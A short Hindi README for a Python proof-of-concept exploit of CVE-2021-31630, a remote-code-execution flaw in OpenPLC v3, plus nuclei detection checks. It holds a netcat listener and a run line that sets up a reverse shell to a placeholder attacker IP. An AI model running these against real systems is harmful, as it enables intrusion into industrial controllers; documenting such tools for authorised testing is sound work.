
यह CVE-2021-31630 के लिए एक आधुनिक Python 3.13+ संगत प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो OpenPLC v3 में एक कमजोरी है जो एक प्रमाणित उपयोगकर्ता को दुर्भावनापूर्ण कोड वाली कस्टम हार्डवेयर परत अपलोड करने की अनुमति देती है, जिससे होस्ट पर रिमोट कोड निष्पादन (RCE) होता है।
मूल कमजोरी की खोज और सलाह फेलिप ओलिवेरा द्वारा। यह पुनः कार्यान्वयन और आधुनिकीकरण httpx, CLI टूलिंग, लॉगिंग और सुरक्षित पहचान तकनीकों का उपयोग करता है।
nc -lvnp 9001
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
वैकल्पिक फ्लैग्स:
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
दूसरा टेम्पलेट लॉगिन करता है और एक हानिरहित पेलोड अपलोड + संकलन का प्रयास करता है ताकि संभावित कमजोरी की पुष्टि हो सके — बिना वास्तविक कोड निष्पादन को ट्रिगर किए।
यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। सिस्टम स्वामी से स्पष्ट अनुमति के बिना उपयोग न करें।